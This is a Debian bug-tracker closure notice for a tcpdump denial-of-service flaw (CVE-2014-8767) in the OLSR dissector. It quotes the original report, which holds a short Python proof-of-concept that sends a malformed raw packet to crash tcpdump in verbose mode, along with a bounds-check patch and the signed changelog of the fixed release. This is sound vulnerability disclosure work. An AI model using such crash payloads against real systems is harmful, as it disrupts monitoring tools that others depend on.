Bug#770434: marked as done (tcpdump: CVE-2014-8767: tcpdump denial of service in verbose mode using malformed OLSR payload)

[Debian Bug Tracking System]

Your message dated Mon, 08 Dec 2014 15:33:46 +0000
with message-id <e1xy0jm-0006tm...@franck.debian.org>
and subject line Bug#770434: fixed in tcpdump 4.3.0-1+deb7u1
has caused the Debian Bug report #770434,
regarding tcpdump: CVE-2014-8767: tcpdump denial of service in verbose mode 
using malformed OLSR payload
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
770434: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=770434
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems

--- Begin Message ---

Package: tcpdump
Version: 4.6.2
tags: Security

Use following script for generate packet:

#!/usr/bin/env python
from socket import socket, AF_PACKET, SOCK_RAW
s = socket(AF_PACKET, SOCK_RAW)
s.bind(("lo", 0))

olsr_frame = "\x00\x1b\xc6\x51\x35\x97\x00\x24\x8c\x7a\xff\x6f\x08\x00\x45\x15\x00\x3d\xf3\x7f\x40\x00\x4d\x11\x30\xc6\x0a\x01\x01\x68\x0a\x02\x02\x02\x02\xba\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x00\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x20\x01\x00\x00\x00"

s.send(olsr_frame)

#sudo tcpdump -i lo -s 0 -n -v
This cause segfault on tcpdump. This bug was reported as CVE-2014-8767.

Proposed patch is in attached file. Main idea is checking the length of available

data before print on screen.

The credit belong to
Steffen Bauch
Twitter: @steffenbauch
http://steffenbauch.de

The originally report in BugTraq is:
http://seclists.org/bugtraq/2014/Nov/90

--
CongNT


--- tcpdump-tcpdump-4.6/print-olsr.c	2014-10-23 14:07:12.000000000 +0700
+++ tcpdump-4.6.2/print-olsr.c	2014-11-21 14:56:18.205542679 +0700
@@ -234,6 +234,13 @@
     ND_PRINT((ndo, "\n\t      neighbor\n\t\t"));
     neighbor = 1;
 
+    u_int caplength;
+
+    /* Checking length of available data before print */
+    caplength = (ndo->ndo_snapend >= msg_data) ? ndo->ndo_snapend - msg_data : 0;
+    if (hello_len > caplength)
+        hello_len = caplength;
+
     while (hello_len >= sizeof(struct in_addr)) {
 
         /* print 4 neighbors per line */

--- End Message ---

--- Begin Message ---

Source: tcpdump
Source-Version: 4.3.0-1+deb7u1

We believe that the bug you reported is fixed in the latest version of
tcpdump, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 770...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Romain Francoise <rfranco...@debian.org> (supplier of updated tcpdump package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Sat, 29 Nov 2014 18:09:49 +0100
Source: tcpdump
Binary: tcpdump
Architecture: amd64 source
Version: 4.3.0-1+deb7u1
Distribution: wheezy-security
Urgency: high
Maintainer: Romain Francoise <rfranco...@debian.org>
Changed-By: Romain Francoise <rfranco...@debian.org>
Closes: 770424 770434
Description: 
 tcpdump    - command-line network traffic analyzer
Changes:
 tcpdump (4.3.0-1+deb7u1) wheezy-security; urgency=high
 .
   * Add patches extracted from the upstream tcpdump_4.3 branch fixing
     three security issues:
     + CVE-2014-8767: missing bounds checks in the OLSR dissector
       (closes: #770434).
     + CVE-2014-8769: missing bounds checks in the AODV dissector
       (closes: #770424).
     + CVE-2014-9140: missing bounds checks in the PPP dissector
Checksums-Sha1: 
 b34a71db8cbbe8e6943d286f069d8b3cd05f44b6 1931 tcpdump_4.3.0-1+deb7u1.dsc
 5d0432e4831ca81633a6c9da732caad77d64a9ac 887619 tcpdump_4.3.0.orig.tar.gz
 44b3da0e4f51dc5e5f37310cc8244e32a86194d5 14972 
tcpdump_4.3.0-1+deb7u1.debian.tar.xz
 25f883fa2d0b7a36925bea91838cc1e54bfe9abc 419898 
tcpdump_4.3.0-1+deb7u1_amd64.deb
Checksums-Sha256: 
 b345b81792830fec740ff616b2b4d5e5a7e6186eb77e3b2f6d1658a1174ff2d4 1931 
tcpdump_4.3.0-1+deb7u1.dsc
 efd08b610210d39977ec3175fa82dad9fbd33587930081be2a905a712dba4286 887619 
tcpdump_4.3.0.orig.tar.gz
 4d36e1a9140d3268a0bc1e71d89ee4649c9c1a17002b20078a85720b5673fe23 14972 
tcpdump_4.3.0-1+deb7u1.debian.tar.xz
 5d46ca857cbdf677a6a00ed1017db49116f181371aaf9f64afa4b4c099573665 419898 
tcpdump_4.3.0-1+deb7u1_amd64.deb
Files: 
 10b6ddd6ebd74e723e5393478585fc25 1931 net optional tcpdump_4.3.0-1+deb7u1.dsc
 a3fe4d30ac85ff5467c889ff46b7e1e8 887619 net optional tcpdump_4.3.0.orig.tar.gz
 af8927109c537f1650af40c92738d107 14972 net optional 
tcpdump_4.3.0-1+deb7u1.debian.tar.xz
 99224ad04e54b31149295e59cc6fcd05 419898 net optional 
tcpdump_4.3.0-1+deb7u1_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCAAGBQJUfZt3AAoJEK0V9DXwX5YtObsP/1JWhy5kxF2c+d2+BgZkdJQJ
w+OZh2ikIXPyrkkD19Sx3nqc3DDk53cDQQ+Nod+zysIU4jPnHlMkO6A399tv/0Un
O+4jGotAKlwtR2+I5udt99f7fI8MKhZB1LctMtJ+CKA70nvY4EbAGb6RO7a2Bd39
KqdIHL0yMByLNl369j4yEHv36aINREE2JePaPXzS/moNYbuscXc+ol2IVBgncnhb
n9MukbH6Q8M/Dx8PPoq1XL7hlIEB3QA2a8EyYpkqoTyo5ksVvOVdvYjfr3tzv6Fa
E5NQ0iogL6nPfu911O5KE8zzU/i5MXXXBr9Kkw7Ps7clG2Je92o5RW3w40M9hDTK
8RHN8VQ08bw4fp54jZ/YjEOmQZVuMwWCv/HbchDuLmRpjCCPlNPDyhF2YcCVGGlW
RQlRKVbPQN4DMs+8ijBs3/jilksyzIb8mO19jNagm5DS4gOtC2T1ox5P/izFgx3O
c5xLIX+UuV0IEke4EEsjiyeM3FSzGbHlOQPusarSv02l3oJPBO2gtFi4opYWecY6
aX7ro9cuIUZIztaeiJdIQD6oZsGeaOs6Lovs9TwnsJ9dONp/xV68G0FCG2i4Dors
wsROBPxQGG5Bn35X+i4lDHRhuox/M6breIl2Yk5MhhFb9GUgvyqv0qP+O4A1BOJM
J6JKdubEEpEwK31xG7We
=cR7Z
-----END PGP SIGNATURE-----

--- End Message ---